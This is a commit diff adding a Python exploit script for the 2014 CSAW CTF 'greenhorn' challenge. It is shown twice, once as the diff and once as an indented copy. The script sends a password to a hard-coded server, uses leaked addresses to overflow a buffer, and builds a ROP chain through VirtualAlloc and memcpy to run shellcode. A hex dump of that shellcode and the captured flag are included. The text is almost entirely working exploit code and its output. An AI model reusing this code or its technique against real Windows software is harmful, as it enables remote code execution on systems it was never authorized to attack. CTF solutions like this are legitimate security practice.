g05u · September 21, 2014 22:05
diff --git a/csaw_2014_greenhorn_exploit.py b/csaw_2014_greenhorn_exploit.py
 #!/usr/bin/env python
 import struct, sys, time
 from nulllife import *

 #CSAW 2014 CTF
 #greenhorn exploit
 offset_data = 0x3F8

 s = NullSocket("54.164.253.42", 9998)
 s.readuntil("Password: ")
 s.writeline("GreenhornSecretPassword!!!")
 s.readuntil("Selection: ")
 s.writeline("a\n")
 s.readuntil("is: 0x")
 leak_module = int(s.read(8), 16)
 print '[!] leak module: 0x%08X' % leak_module
 s.readuntil("at: 0x")
 leak_stack = int(s.read(8), 16)
 print '[!] leak stack: 0x%08X' % leak_stack
 s.readuntil("Selection: ")
 s.writeline("V")
 s.readuntil("(with some constraints).\n\n")

 address_clean_4args = leak_module + 0x0040199e
 address_payload = leak_stack - offset_data
 address_new_ebp = address_payload + 0x500

 shellcode = open('scgreen', 'rb').read()
 print '[!] Shellcode: ' + shellcode.encode('hex')

 shellcode = shellcode.replace("\xD0\x14\x40\x00", pack(leak_module + 0x0401460))


 payload = "CSAW"
 payload += ("\x90" * 32) + shellcode
 payload += "A" * (0x400 - len(payload))
 payload += pack(address_new_ebp) #new ebp


 ###call VirtualAlloc
 payload += pack(leak_module + 0x004011C0)  # call ds:VirtualAlloc
 payload += pack(address_clean_4args)
 payload += pack(0)		#lpAddress
 payload += pack(0x1000) #size
 payload += pack(0x40) 	#flprotect
 payload += pack(address_new_ebp + 0x8) 	#void *

 ###restore ebp
 payload += pack(leak_module + 0x00401512) #pop ebp; retn
 payload += pack(address_new_ebp) 

 ###call memcpy
 payload += pack(leak_module + 0x004011F3) #push args from ebp and call memcpy
 payload += pack(address_new_ebp) #still ebp

 ###call shellcode
 payload += pack(leak_module + 0x00401C75) #pop esi
 payload += pack(address_new_ebp + 0x08)
 payload += pack(leak_module + 0x00401C65) #mov eax, [esi] ... call eax

 payload += "B" * (0x500 - len(payload))
 payload += "CCCC"
 payload += "DDDD"

 ###args for memcpy
 payload += "EEEE" #ebp + 0x8
 payload += pack(address_payload + 4) #ebp + 0xC = address_shellcode
 payload += pack(0x200) 	#ebp +0x10


 s.writeline(payload)
 print s.readuntil("}")
 '''
 $ python green.py
 [!] leak module: 0xFFE50000
 [!] leak stack: 0x001EF49C
 [!] Shellcode: e8000000005b8db389010000568db38101000056680200000068884e0d00e86a0000006800000000688000000068030000006800000000680100000068000000808d839101000050ff93890100008985f8fbffff68000000008d85fcfbffff5068000100008d8500fcffff508b85f8fbffff50ff938d0100008d8500fcffff680001000050b8d0144000ffd0c35589e55156578b4d0c8b75108b7d14ff36ff7508e819000000890781c70400000081c604000000e2e65f5e5989ec5dc210005589e55356575164ff3530000000588b400c8b480c8b118b413068020000008b7d085750e86a00000085c0740789d1e9e1ffffff8b4118508b583c01d88b5878585001c38b4b1c8b53208b5b2401c101c201c38b32585001c66801000000ff750c56e82c00000085c0741181c20400000081c302000000e9d7ffffff5831d2668b13c1e20201d10301595f5e5b89ec5dc208005589e551535231c931db31d28b45088a1080ca6001d3d1e30345108a0884c9e0ee31c08b4d0c39cb7401405a5b5989ec5dc20c004677060062d5000000000000000000006b657900
 key{He may be angry all the time, but he's the only one that understand Windows DACLs}
 '''
	#!/usr/bin/env python
	import struct, sys, time
	from nulllife import *

	#CSAW 2014 CTF
	#greenhorn exploit
	offset_data = 0x3F8

	s = NullSocket("54.164.253.42", 9998)
	s.readuntil("Password: ")
	s.writeline("GreenhornSecretPassword!!!")
	s.readuntil("Selection: ")
	s.writeline("a\n")
	s.readuntil("is: 0x")
	leak_module = int(s.read(8), 16)
	print '[!] leak module: 0x%08X' % leak_module
	s.readuntil("at: 0x")
	leak_stack = int(s.read(8), 16)
	print '[!] leak stack: 0x%08X' % leak_stack
	s.readuntil("Selection: ")
	s.writeline("V")
	s.readuntil("(with some constraints).\n\n")

	address_clean_4args = leak_module + 0x0040199e
	address_payload = leak_stack - offset_data
	address_new_ebp = address_payload + 0x500

	shellcode = open('scgreen', 'rb').read()
	print '[!] Shellcode: ' + shellcode.encode('hex')

	shellcode = shellcode.replace("\xD0\x14\x40\x00", pack(leak_module + 0x0401460))


	payload = "CSAW"
	payload += ("\x90" * 32) + shellcode
	payload += "A" * (0x400 - len(payload))
	payload += pack(address_new_ebp) #new ebp


	###call VirtualAlloc
	payload += pack(leak_module + 0x004011C0) # call ds:VirtualAlloc
	payload += pack(address_clean_4args)
	payload += pack(0) #lpAddress
	payload += pack(0x1000) #size
	payload += pack(0x40) #flprotect
	payload += pack(address_new_ebp + 0x8) #void *

	###restore ebp
	payload += pack(leak_module + 0x00401512) #pop ebp; retn
	payload += pack(address_new_ebp)

	###call memcpy
	payload += pack(leak_module + 0x004011F3) #push args from ebp and call memcpy
	payload += pack(address_new_ebp) #still ebp

	###call shellcode
	payload += pack(leak_module + 0x00401C75) #pop esi
	payload += pack(address_new_ebp + 0x08)
	payload += pack(leak_module + 0x00401C65) #mov eax, [esi] ... call eax

	payload += "B" * (0x500 - len(payload))
	payload += "CCCC"
	payload += "DDDD"

	###args for memcpy
	payload += "EEEE" #ebp + 0x8
	payload += pack(address_payload + 4) #ebp + 0xC = address_shellcode
	payload += pack(0x200) #ebp +0x10


	s.writeline(payload)
	print s.readuntil("}")
	'''
	$ python green.py
	[!] leak module: 0xFFE50000
	[!] leak stack: 0x001EF49C
	[!] Shellcode: e8000000005b8db389010000568db38101000056680200000068884e0d00e86a0000006800000000688000000068030000006800000000680100000068000000808d839101000050ff93890100008985f8fbffff68000000008d85fcfbffff5068000100008d8500fcffff508b85f8fbffff50ff938d0100008d8500fcffff680001000050b8d0144000ffd0c35589e55156578b4d0c8b75108b7d14ff36ff7508e819000000890781c70400000081c604000000e2e65f5e5989ec5dc210005589e55356575164ff3530000000588b400c8b480c8b118b413068020000008b7d085750e86a00000085c0740789d1e9e1ffffff8b4118508b583c01d88b5878585001c38b4b1c8b53208b5b2401c101c201c38b32585001c66801000000ff750c56e82c00000085c0741181c20400000081c302000000e9d7ffffff5831d2668b13c1e20201d10301595f5e5b89ec5dc208005589e551535231c931db31d28b45088a1080ca6001d3d1e30345108a0884c9e0ee31c08b4d0c39cb7401405a5b5989ec5dc20c004677060062d5000000000000000000006b657900
	key{He may be angry all the time, but he's the only one that understand Windows DACLs}
	'''